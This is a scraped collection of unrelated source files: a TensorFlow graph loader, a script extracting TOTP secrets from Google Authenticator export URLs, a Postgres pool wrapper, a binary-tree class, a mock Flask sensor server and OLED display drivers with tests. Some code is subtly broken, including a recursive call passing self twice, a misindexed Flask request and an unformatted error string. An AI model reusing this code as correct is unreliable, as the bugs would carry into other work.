# saver = tf.train.import_meta_graph("../checkpoint/yolov3_coco.ckpt.meta", clear_devices=True)
saver = tf.train.import_meta_graph("../checkpoint/yolov3_coco_demo.ckpt.meta", clear_devices=True)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
# saver.restore(sess, "../checkpoint/yolov3_coco.ckpt")
saver.restore(sess, "../checkpoint/yolov3_coco_demo.ckpt")
# save
localtime = time.strftime("%Y%m%d_%H%M%S", time.localtime())
train_writer = tf.summary.FileWriter("../log/%s" % localtime, sess.graph)
if __name__ == "__main__":
save_graph()
``` |
{
"source": "4f77616973/Wristkey",
"score": 3
} |
#### File: main/python/extract_otp_secret_keys.py
```python
import base64
import fileinput
import sys
from urllib.parse import parse_qs, urlencode, urlparse, quote
from os import path, mkdir
from re import sub, compile as rcompile
import generated_python.google_auth_pb2
def decode(url):
# https://stackoverflow.com/questions/40226049/find-enums-listed-in-python-descriptor-for-protobuf
def get_enum_name_by_number(parent, field_name):
field_value = getattr(parent, field_name)
return parent.DESCRIPTOR.fields_by_name[field_name].enum_type.values_by_number.get(field_value).name
def convert_secret_from_bytes_to_base32_str(bytes):
return str(base64.b32encode(otp.secret), 'utf-8').replace('=', '')
line = url
i = j = 0
if line.startswith('#') or line == '': print("no data in string passed")
parsed_url = urlparse(line)
params = parse_qs(parsed_url.query)
if not 'data' in params:
print('\nERROR: no data query parameter in input URL\ninput file: {}\nline "{}"\nProbably a wrong file was given')
data_encoded = params['data'][0]
data = base64.b64decode(data_encoded)
payload = generated_python.google_auth_pb2.MigrationPayload()
payload.ParseFromString(data)
i += 1
# pylint: disable=no-member
json = ""
json+= "<$beginwristkeygoogleauthenticatorimport$>"
json+=("{")
for otp in payload.otp_parameters:
j += 1
secret = convert_secret_from_bytes_to_base32_str(otp.secret)
url_params = { 'secret': secret }
if otp.type == 1: url_params['counter'] = otp.counter
if otp.issuer: url_params['issuer'] = otp.issuer
otp_url = 'otpauth://{}/{}?'.format('totp' if otp.type == 2 else 'hotp', quote(otp.name)) + urlencode(url_params)
if otp.issuer == "":
json+=("\""+otp.name+"\""+":")
else:
json+=("\""+otp.issuer+"\""+":")
json+=("{")
json+=("\"secret\""+":"+"\""+secret+"\""+",")
json+=("\"username\""+":"+"\""+otp.name+"\""+",")
json+=("\"type\""+":"+"\""+str(otp.type)+"\""+"")
json+=("},")
json=json[:-1]
json+=("}")
json+= "<$endwristkeygoogleauthenticatorimport$>"
print(json)
``` |
{
"source": "4Five-Labs-Inc/ML_REST_API_Boilerplate",
"score": 3
} |
#### File: src/database/connection.py
```python
import os
import psycopg2
from psycopg2 import pool
from dotenv import load_dotenv
load_dotenv()
class Connection:
"""
initialize constructor
creates database connection
"""
def __init__(self):
try:
self.pool = psycopg2.pool.SimpleConnectionPool(1, 20, user = os.getenv('DB_USER'),
password = os.getenv('<PASSWORD>'),
host = os.getenv('DB_HOST'),
port = os.getenv('DB_PORT'),
database = os.getenv('DB_NAME'))
except (Exception, psycopg2.Error) as error :
print ("Error while connecting to Database", error)
"""
fetch_query executes the fetch query
:param query: any string
:return: list
"""
def fetch_query(self, query):
try:
connection = self.pool.getconn()
cursor = connection.cursor()
cursor.execute(query)
return cursor.fetchall()
except (Exception, psycopg2.Error) as error :
print ("Error while executing query", error)
finally:
#closing database connection.
if(connection):
cursor.close()
connection.close()
self.pool.putconn(connection)
"""
insert_query executes the input query
:param query: any string
:param values: dict
:return: list
"""
def insert_query(self, query, values):
try:
connection = self.pool.getconn()
cursor = connection.cursor()
cursor.execute(query, values)
return connection.commit()
except (Exception, psycopg2.Error) as error :
print ("Error while executing query", error)
finally:
#closing database connection.
if(connection):
cursor.close()
connection.close()
self.pool.putconn(connection)
``` |
{
"source": "4ft35t/utils",
"score": 4
} |
#### File: 4ft35t/utils/tree.py
```python
class Node(object):
def __init__(self, value, left=None, right=None):
self.value = value
self.left = left
self.right = right
class Tree(object):
def __init__(self):
self.root = None
def __build_tree_inorder_preorder(self, in_order, pre_order):
'''利用中序遍历序列和前序遍历序列重建二叉树
1. 先序遍历的第一个结点总是根结点, 先序遍历时父亲结点总是在孩子结点之前遍历
2. 中序遍历序列中,根节点左侧的 n 个节点是左子树,右侧 m 个节点是右子树
3. 如上,前序遍历序列中,从第二个节点开始计数,前 n 个为左子树,后 m 个为右子树
'''
if not (in_order and pre_order): # 任意一个序列为空
return
root = pre_order[0]
root_index = in_order.index(root)
node = Node(root)
# 递归构建左右子树
node.left = self.__build_tree_inorder_preorder(self, in_order[:root_index], pre_order[1:root_index+1])
node.right = self.__build_tree_inorder_preorder(self, in_order[root_index+1:], pre_order[root_index+1:])
return node
def __build_tree_inorder_postorder(self, in_order, post_order):
'''利用中序遍历序列和后序遍历序列重建二叉树
1. 后续遍历序列中最后一个元素为根节点
2. 中序遍历序列中,根节点左侧的 n 个节点是左子树,右侧 m 个节点是右子树
3. 如上,后序遍历序列中,前 n 个为左子树,之后的 m 个为右子树
'''
if not (in_order and post_order): # 任意一个序列为空
return
root = post_order[-1]
root_index = in_order.index(root)
node = Node(root)
# 递归构建左右子树
node.left = self.__build_tree_inorder_postorder(in_order[:root_index], post_order[:root_index])
node.right = self.__build_tree_inorder_postorder(in_order[root_index+1:], post_order[root_index:-1])
return node
def build_tree(self, root=None, left=None, right=None, in_order=None, pre_order= None, post_order=None):
if root is not None: # 手工指定各节点值
self.root = Node(root, left, right)
return
if in_order: # 通过已知遍历序列重建树
if pre_order: # 前序遍历序列
self.root = self.__build_tree_inorder_preorder(in_order, pre_order)
elif post_order: # 后序遍历序列
self.root = self.__build_tree_inorder_postorder(in_order, post_order)
def pre_order(self):
'''前序遍历
'''
root = self.root
def __pre_order(r):
if r:
yield r.value
for i in __pre_order(r.left):
yield i
for i in __pre_order(r.right):
yield i
return [i for i in __pre_order(root)]
def in_order(self):
'''中序遍历
Ref: http://www.gocalf.com/blog/traversing-binary-tree.html
http://coolshell.cn/articles/9886.html
'''
root = self.root
def __in_order(r):
if not r:
return
for i in __in_order(r.left):
yield i
yield r.value
for i in __in_order(r.right):
yield i
return [i for i in __in_order(root)]
def post_order(self, r=None):
'''后序遍历
'''
root = self.root
def __post_order(r):
if not r:
return
for i in __post_order(r.left):
yield i
for i in __post_order(r.right):
yield i
yield r.value
return [i for i in __post_order(root)]
def get_all_depth(self):
'''计算所有节点的深度, 前序遍历
Ref: http://cnn237111.blog.51cto.com/2359144/842146
'''
root = self.root
def __get_depth(r, depth=1):
if not r:
return
yield (r.value, depth)
depth += 1
for i in __get_depth(r.left, depth):
yield i
for i in __get_depth(r.right, depth):
yield i
return dict(__get_depth(root))
def get_leaf_node(self):
'''获取所有叶子节点
'''
root = self.root
def __get_leaf(r):
if not r:
return
if r.left is None and r.right is None:
yield r
for i in __get_leaf(r.left):
yield i
for i in __get_leaf(r.right):
yield i
return [i for i in __get_leaf(root)]
def get_path(self, value, root=None):
'''获取某个节点在树中的访问路径
Ref: http://blog.csdn.net/GetNextWindow/article/details/23332265
'''
if not root:
root = self.root
stack = []
def __get_path(root):
stack.append(root.value)
found = False
if root.value == value:
return stack
if not found and root.left: # 先从左子树找
found = __get_path(root.left)
if not found and root.right:
found = __get_path(root.right)
if not found: # 当前节点的左右子树都没找到
stack.pop()
return found
return __get_path(root)
def test():
import pdb;pdb.set_trace()
n1 = Node(1, Node(2), Node(3))
n2 = Node(4, Node(5))
t = Tree()
t.build_tree(0, n1, n2)
print t.pre_order()
print t.in_order()
print t.post_order()
t1 = Tree()
t1.build_tree('X', n2, t.root)
print t1.pre_order()
print t.get_all_depth()
in_list = 'ABCDEFGHI'
post_list = 'ACEDBHIGF'
t.build_tree(in_order=in_list, post_order=post_list)
print t.get_all_depth()
print [i.value for i in t.get_leaf_node()]
print t.get_path('H')
in_list = "T b H V h 3 o g P W F L u A f G r m 1 x J 7 w e 0 i Q Y n Z 8 K v q k 9 y 5 C N B D 2 4 U l c p I E M a j 6 S R O X s d z t".split(" ")
post_list = "T V H o 3 h P g b F f A u m r 7 J x e w 1 Y Q i 0 Z n G L K y 9 k q v N D B C 5 4 c l U 2 8 E I R S 6 j d s X O a M p W t z".split(" ")
t.build_tree(in_order= in_list, post_order=post_list)
depth = t.get_all_depth()
max_depth = sorted(depth.items(), key= lambda x:x[1], reverse=True)[0]
print max_depth
print t.get_path(max_depth[0])
if __name__ == '__main__':
test()
``` |
{
"source": "4gatepylon/NeuroMHW",
"score": 2
} |
#### File: 4gatepylon/NeuroMHW/simpleserverneuro.py
```python
import os
# import pymongo
import json
import random
import hashlib
import time
import requests
from flask import Flask, request, abort, Response
from flask_cors import CORS
from hashlib import sha256
app = Flask(__name__)
CORS(app)
def hashthis(st):
hash_object = hashlib.md5(st.encode())
h = str(hash_object.hexdigest())
return h
@app.route('/simple', methods=['GET', 'POST'])
def simple():
# js = transcribe()
request_json = request.get_json()
action = request['action']
retjson = {}
if action == "doNothing":
doaction = "none"
data = {}
ecg = []
eeg = []
emg = []
for i in range(50):
datai = random.randint(0, 1024)
ecg.append(datai)
datai = random.randint(0, 1024)
eeg.append(datai)
datai = random.randint(0, 1024)
emg.append(datai)
data['ecg'] = ecg
data['eeg'] = eeg
data['emg'] = emg
retjson['doaction'] = doaction
retjson['data'] = data
return json.dumps(retjson)
if action == "doBeep":
doaction = "sound"
data = {}
ecg = []
eeg = []
emg = []
for i in range(50):
datai = random.randint(0, 1024)
ecg.append(datai)
datai = random.randint(0, 1024)
eeg.append(datai)
datai = random.randint(0, 1024)
emg.append(datai)
data['ecg'] = ecg
data['eeg'] = eeg
data['emg'] = emg
retjson['doaction'] = doaction
retjson['data'] = data
return json.dumps(retjson)
if action == "doNudge":
doaction = "motor"
data = {}
ecg = []
eeg = []
emg = []
for i in range(50):
datai = random.randint(0, 1024)
ecg.append(datai)
datai = random.randint(0, 1024)
eeg.append(datai)
datai = random.randint(0, 1024)
emg.append(datai)
data['ecg'] = ecg
data['eeg'] = eeg
data['emg'] = emg
retjson['doaction'] = doaction
retjson['data'] = data
return json.dumps(retjson)
if action == "doPopup":
doaction = "notify"
data = {}
ecg = []
eeg = []
emg = []
for i in range(50):
datai = random.randint(0, 1024)
ecg.append(datai)
datai = random.randint(0, 1024)
eeg.append(datai)
datai = random.randint(0, 1024)
emg.append(datai)
data['ecg'] = ecg
data['eeg'] = eeg
data['emg'] = emg
retjson['doaction'] = doaction
retjson['data'] = data
return json.dumps(retjson)
retjson['status'] = "command unknown"
return json.dumps(retjson)
@app.route('/', methods=['GET', 'POST'])
def hello_world():
# js = transcribe()
js = {}
js['status'] = 'done'
resp = Response(js, status=200, mimetype='application/json')
print ("****************************")
print (resp)
return js
# return resp
@app.route("/dummyJson", methods=['GET', 'POST'])
def dummyJson():
res = request.get_json()
print (res)
resraw = request.get_data()
print (resraw)
## args = request.args
## form = request.form
## values = request.values
## print (args)
## print (form)
## print (values)
## sres = request.form.to_dict()
status = {}
status["server"] = "up"
status["request"] = res
statusjson = json.dumps(status)
print(statusjson)
js = "<html> <body>OK THIS WoRKS</body></html>"
resp = Response(statusjson, status=200, mimetype='application/json')
##resp.headers['Link'] = 'http://google.com'
return resp
if __name__ == '__main__':
# app.run()
# app.run(debug=True, host = '192.168.127.12', port = 8005)
app.run(debug=True, host = 'localhost', port = 8005) ##change hostname here
``` |
{
"source": "4gbag/ssd1306",
"score": 3
} |
#### File: ssd1306/examples/perfloop.py
```python
import sys
import time
from PIL import Image, ImageDraw
from demo_opts import device
import demo
class Timer:
def __enter__(self):
self.start = time.clock()
return self
def __exit__(self, *args):
self.end = time.clock()
self.interval = self.end - self.start
def main():
elapsed_time = 0
count = 0
print("Testing OLED dislay rendering performance")
print("Press Ctrl-C to abort test\n")
image = Image.new(device.mode, device.size)
draw = ImageDraw.Draw(image)
demo.primitives(draw)
for i in range(5, 0, -1):
sys.stdout.write("Starting in {0} seconds...\r".format(i))
sys.stdout.flush()
time.sleep(1)
try:
while True:
with Timer() as t:
device.display(image)
elapsed_time += t.interval
count += 1
if count % 31 == 0:
avg_transit_time = elapsed_time * 1000 / count
avg_fps = count / elapsed_time
sys.stdout.write("#### iter = {0:6d}: render time = {1:.2f} ms, frame rate = {2:.2f} FPS\r".format(count, avg_transit_time, avg_fps))
sys.stdout.flush()
except KeyboardInterrupt:
del image
if __name__ == "__main__":
main()
```
#### File: ssd1306/oled/serial.py
```python
class i2c(object):
"""
Wrap an `I2C <https://en.wikipedia.org/wiki/I%C2%B2C>`_ interface to
provide data and command methods.
.. note::
1. Only one of ``bus`` OR ``port`` arguments should be supplied;
if both are, then ``bus`` takes precedence.
2. If ``bus`` is provided, there is an implicit expectation
that it has already been opened.
"""
def __init__(self, bus=None, port=1, address=0x3C):
import smbus2
self._cmd_mode = 0x00
self._data_mode = 0x40
self._bus = bus or smbus2.SMBus(port)
self._addr = address
def command(self, *cmd):
"""
Sends a command or sequence of commands through to the I2C address
- maximum allowed is 32 bytes in one go.
"""
assert(len(cmd) <= 32)
self._bus.write_i2c_block_data(self._addr, self._cmd_mode, list(cmd))
def data(self, data):
"""
Sends a data byte or sequence of data bytes through to the I2C
address - maximum allowed in one transaction is 32 bytes, so if
data is larger than this, it is sent in chunks.
"""
i = 0
n = len(data)
write = self._bus.write_i2c_block_data
while i < n:
write(self._addr, self._data_mode, list(data[i:i + 32]))
i += 32
def cleanup(self):
"""
Clean up I2C resources
"""
self._bus.close()
class spi(object):
"""
Wraps an `SPI <https://en.wikipedia.org/wiki/Serial_Peripheral_Interface_Bus>`_
interface to provide data and command methods.
* The DC pin (Data/Command select) defaults to GPIO 24 (BCM).
* The RST pin (Reset) defaults to GPIO 25 (BCM).
"""
def __init__(self, spi=None, gpio=None, port=0, device=0, bus_speed_hz=8000000, bcm_DC=24, bcm_RST=25):
self._gpio = gpio or self.__rpi_gpio__()
self._spi = spi or self.__spidev__()
self._spi.open(port, device)
self._spi.max_speed_hz = bus_speed_hz
self._bcm_DC = bcm_DC
self._bcm_RST = bcm_RST
self._cmd_mode = self._gpio.LOW # Command mode = Hold low
self._data_mode = self._gpio.HIGH # Data mode = Pull high
self._gpio.setmode(self._gpio.BCM)
self._gpio.setup(self._bcm_DC, self._gpio.OUT)
self._gpio.setup(self._bcm_RST, self._gpio.OUT)
self._gpio.output(self._bcm_RST, self._gpio.HIGH) # Keep RESET pulled high
def __rpi_gpio__(self):
# RPi.GPIO _really_ doesn't like being run on anything other than
# a Raspberry Pi... this is imported here so we can swap out the
# implementation for a mock
import RPi.GPIO
return RPi.GPIO
def __spidev__(self):
# spidev cant compile on macOS, so use a similar technique to
# initialize (mainly so the tests run unhindered)
import spidev
return spidev.SpiDev()
def command(self, *cmd):
"""
Sends a command or sequence of commands through to the SPI device.
"""
self._gpio.output(self._bcm_DC, self._cmd_mode)
self._spi.xfer2(list(cmd))
def data(self, data):
"""
Sends a data byte or sequence of data bytes through to the SPI device.
If the data is more than 4Kb in size, it is sent in chunks.
"""
self._gpio.output(self._bcm_DC, self._data_mode)
i = 0
n = len(data)
write = self._spi.xfer2
while i < n:
write(data[i:i + 4096])
i += 4096
def cleanup(self):
"""
Clean up SPI & GPIO resources
"""
self._spi.close()
self._gpio.cleanup()
class noop(object):
"""
Does nothing, used for pseudo-devices / emulators, which dont have a serial
interface.
"""
def command(self, *cmd):
pass
def data(self, data):
pass
def cleanup(self):
pass
```
#### File: ssd1306/tests/test_ssd1331.py
```python
try:
from unittest.mock import call, Mock
except ImportError:
from mock import call, Mock
import pytest
from oled.device import ssd1331
from oled.render import canvas
import baseline_data
serial = Mock(unsafe=True)
def setup_function(function):
serial.reset_mock()
serial.command.side_effect = None
def test_init_96x64():
ssd1331(serial)
serial.command.assert_has_calls([
# Initial burst are initialization commands
call(174, 160, 114, 161, 0, 162, 0, 164, 168, 63, 173,
142, 176, 11, 177, 116, 179, 208, 138, 128, 139,
128, 140, 128, 187, 62, 190, 62, 135, 15),
# set contrast
call(129, 255, 130, 255, 131, 255),
# reset the display
call(21, 0, 95, 117, 0, 63),
# called last, is a command to show the screen
call(175)
])
# Next 1024 are all data: zero's to clear the RAM
# (12288 = 96 * 64 * 2)
serial.data.assert_called_once_with([0] * 96 * 64 * 2)
def test_init_invalid_dimensions():
with pytest.raises(ValueError) as ex:
ssd1331(serial, width=23, height=57)
assert "Unsupported display mode: 23x57" in str(ex.value)
def test_init_handle_ioerror():
serial.command.side_effect = IOError(-99, "Test exception")
with pytest.raises(IOError) as ex:
ssd1331(serial)
assert "Failed to initialize SSD1331 display driver" in str(ex.value)
def test_hide():
device = ssd1331(serial)
serial.reset_mock()
device.hide()
serial.command.assert_called_once_with(174)
def test_show():
device = ssd1331(serial)
serial.reset_mock()
device.show()
serial.command.assert_called_once_with(175)
def test_display():
device = ssd1331(serial)
serial.reset_mock()
# Use the same drawing primitives as the demo
with canvas(device) as draw:
baseline_data.primitives(device, draw)
# Initial command to reset the display
serial.command.assert_called_once_with(21, 0, 95, 117, 0, 63)
# Next 1024 bytes are data representing the drawn image
serial.data.assert_called_once_with(baseline_data.demo_ssd1331)
``` |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.